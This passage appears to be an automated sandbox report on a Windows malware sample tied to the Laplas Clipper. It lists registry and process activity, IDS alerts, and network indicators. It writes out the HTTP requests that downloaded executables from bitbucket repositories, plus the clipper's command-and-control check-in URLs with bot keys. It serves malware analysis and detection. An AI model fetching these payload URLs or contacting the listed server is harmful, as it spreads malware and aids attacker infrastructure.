Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: 35_2_00C0A1F1 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 35_2_00C0A1F1
Source: C:\Windows\System32\conhost.exe Code function: 39_2_000002505E59BE3C FindFirstFileExW, 39_2_000002505E59BE3C
Source: C:\Windows\System32\conhost.exe Code function: 41_2_000001C08C1BBE3C FindFirstFileExW, 41_2_000001C08C1BBE3C
Source: C:\Windows\System32\dllhost.exe Code function: 42_2_000002131118BE3C FindFirstFileExW, 42_2_000002131118BE3C
Source: C:\Windows\System32\winlogon.exe Code function: 43_2_00000225DC64BE3C FindFirstFileExW, 43_2_00000225DC64BE3C
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Code function: 4x nop then push rbx 7_2_00007FF7D3B99F43

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2039775 - Severity 1 - ET MALWARE Laplas Clipper - Regex CnC Request : 192.168.2.4:49739 -> 45.159.189.105:80
Source: Network traffic Suricata IDS: 2039776 - Severity 1 - ET MALWARE Laplas Clipper - SetOnline CnC Checkin : 192.168.2.4:49740 -> 45.159.189.105:80
Source: Network traffic Suricata IDS: 2039775 - Severity 1 - ET MALWARE Laplas Clipper - Regex CnC Request : 192.168.2.4:50007 -> 45.159.189.105:80
Source: Network traffic Suricata IDS: 2039776 - Severity 1 - ET MALWARE Laplas Clipper - SetOnline CnC Checkin : 192.168.2.4:50008 -> 45.159.189.105:80
Source: Network traffic Suricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.4:49730 -> 185.166.143.49:443
Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000001.00000002.1828229655.000001EC31B7B000.00000004.00000800.00020000.00000000.sdmp String found in memory: Content-Security-Policy: style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; object-src 'none'; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
Source: powershell.exe, 00000001.00000002.1828229655.000001EC31BD4000.00000004.00000800.00020000.00000000.sdmp String found in memory: style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; object-src 'none'; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
Source: powershell.exe, 00000001.00000002.1828229655.000001EC31BC0000.00000004.00000800.00020000.00000000.sdmp String found in memory: object-src 'none'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
Source: powershell.exe, 00000001.00000002.1828229655.000001EC31B1D000.00000004.00000800.00020000.00000000.sdmp String found in memory: Content-Security-Policy: object-src 'none'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /5940jg9834/gf3443f3/raw/0adfaef4f847a17ea4e4f656dcd85e76293780ed/D.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /recheatsorg/recheatsdirect/raw/00eb2d0b436591fce1153baca762509e762f2ce4/CLP.exe HTTP/1.1Host: bitbucket.org
Source: global traffic HTTP traffic detected: GET /recheatsorg/recheatsdirect/raw/00eb2d0b436591fce1153baca762509e762f2ce4/Devmin.exe HTTP/1.1Host: bitbucket.org
Source: global traffic HTTP traffic detected: GET /bot/regex HTTP/1.1Host: 45.159.189.105Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /bot/online?guid=724471\\user&key=5ef1aac7b3430729f6cbc95fb4d2d2a62582e7382955ffc87026077cb28ab31e HTTP/1.1Host: 45.159.189.105Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /bot/regex HTTP/1.1Host: 45.159.189.105Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /bot/online?guid=724471\\user&key=5ef1aac7b3430729f6cbc95fb4d2d2a62582e7382955ffc87026077cb28ab31e HTTP/1.1Host: 45.159.189.105Cache-Control: no-cache
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 45.159.189.105 45.159.189.105
Source: Joe Sandbox View IP Address: 185.166.143.49 185.166.143.49
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: HOSTING-SOLUTIONSUS HOSTING-SOLUTIONSUS
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49739 -> 45.159.189.105:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49740 -> 45.159.189.105:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:50007 -> 45.159.189.105:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:50008 -> 45.159.189.105:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49731 -> 185.166.143.49:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49732 -> 185.166.143.49:443
Source: unknown TCP traffic detected without corresponding DNS query: 45.159.189.105
Source: unknown TCP traffic detected without corresponding DNS query: 45.159.189.105
Source: unknown TCP traffic detected without corresponding DNS query: 45.159.189.105
Source: unknown TCP traffic detected without corresponding DNS query: 45.159.189.105
Source: unknown TCP traffic detected without corresponding DNS query: 45.159.189.105
Source: unknown TCP traffic detected without corresponding DNS query: 45.159.189.105
Source: unknown TCP traffic detected without corresponding DNS query: 45.159.189.105
Source: unknown TCP traffic detected without corresponding DNS query: 45.159.189.105
Source: unknown TCP traffic detected without corresponding DNS query: 45.159.189.105
Source: unknown TCP traffic detected without corresponding DNS query: 45.159.189.105
Source: unknown TCP traffic detected without corresponding DNS query: 45.159.189.105
Source: unknown TCP traffic detected without corresponding DNS query: 45.159.189.105
Source: unknown TCP traffic detected without corresponding DNS query: 45.159.189.105
Source: unknown TCP traffic detected without corresponding DNS query: 45.159.189.105
Source: unknown TCP traffic detected without corresponding DNS query: 45.159.189.105
Source: unknown TCP traffic detected without corresponding DNS query: 45.159.189.105
Source: unknown TCP traffic detected without corresponding DNS query: 45.159.189.105
Source: unknown TCP traffic detected without corresponding DNS query: 45.159.189.105
Source: unknown TCP traffic detected without corresponding DNS query: 45.159.189.105
Source: unknown TCP traffic detected without corresponding DNS query: 45.159.189.105
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /5940jg9834/gf3443f3/raw/0adfaef4f847a17ea4e4f656dcd85e76293780ed/D.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /recheatsorg/recheatsdirect/raw/00eb2d0b436591fce1153baca762509e762f2ce4/CLP.exe HTTP/1.1Host: bitbucket.org
Source: global traffic HTTP traffic detected: GET /recheatsorg/recheatsdirect/raw/00eb2d0b436591fce1153baca762509e762f2ce4/Devmin.exe HTTP/1.1Host: bitbucket.org
Source: global traffic HTTP traffic detected: GET /bot/regex HTTP/1.1Host: 45.159.189.105Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /bot/online?guid=724471\\user&key=5ef1aac7b3430729f6cbc95fb4d2d2a62582e7382955ffc87026077cb28ab31e HTTP/1.1Host: 45.159.189.105Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /bot/regex HTTP/1.1Host: 45.159.189.105Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /bot/online?guid=724471\\user&key=5ef1aac7b3430729f6cbc95fb4d2d2a62582e7382955ffc87026077cb28ab31e HTTP/1.1Host: 45.159.189.105Cache-Control: no-cache
Source: global traffic DNS traffic detected: DNS query: bitbucket.org
Source: svcupdater.exe, 00000023.00000002.2994296261.0000000001152000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.159.189.105/
Source: svcupdater.exe, 00000023.00000002.2994296261.0000000001152000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.159.189.105/bot/online?guid=724471
Source: svcupdater.exe, 00000023.00000002.2994296261.0000000001165000.00000004.00000020.00020000.00000000.sdmp, svcupdater.exe, 00000023.00000002.2994296261.000000000110D000.00000004.00000020.00020000.00000000.sdmp, svcupdater.exe, 00000023.00000002.2994296261.0000000001152000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.159.189.105/bot/regex
Source: svcupdater.exe, 00000023.00000002.2994296261.0000000001152000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.159.189.105/bot/regexystem32
Source: powershell.exe, 00000001.00000002.1828229655.000001EC31BD4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31B1D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bitbucket.org
Source: lsass.exe, 0000002C.00000000.2224956788.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: lsass.exe, 0000002C.00000002.2975316447.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2225232063.00000202C0400000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: lsass.exe, 0000002C.00000000.2223864605.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2223864605.00000202BFCB5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2963978319.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: lsass.exe, 0000002C.00000003.2253659428.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224716496.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: lsass.exe, 0000002C.00000002.2975316447.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2225232063.00000202C0400000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: powershell.exe, 00000028.00000002.2588137251.000001C536E3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft
Source: lsass.exe, 0000002C.00000000.2224956788.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: lsass.exe, 0000002C.00000002.2975316447.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2225232063.00000202C0400000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: lsass.exe, 0000002C.00000000.2223864605.00000202BFCB5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 0000002C.00000000.2223864605.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2223864605.00000202BFCB5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2963978319.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 0000002C.00000002.2975316447.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2225232063.00000202C0400000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 0000002C.00000003.2253659428.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224716496.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: lsass.exe, 0000002C.00000000.2225392956.00000202C043D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224168182.00000202C024B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2966233534.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
